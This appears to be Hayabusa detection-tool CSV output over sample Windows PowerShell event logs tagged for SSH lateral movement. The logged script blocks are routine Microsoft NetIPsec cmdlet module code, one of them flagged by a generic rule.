SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.612 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.614 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.615 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.615 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.616 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.616 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.659 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.659 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 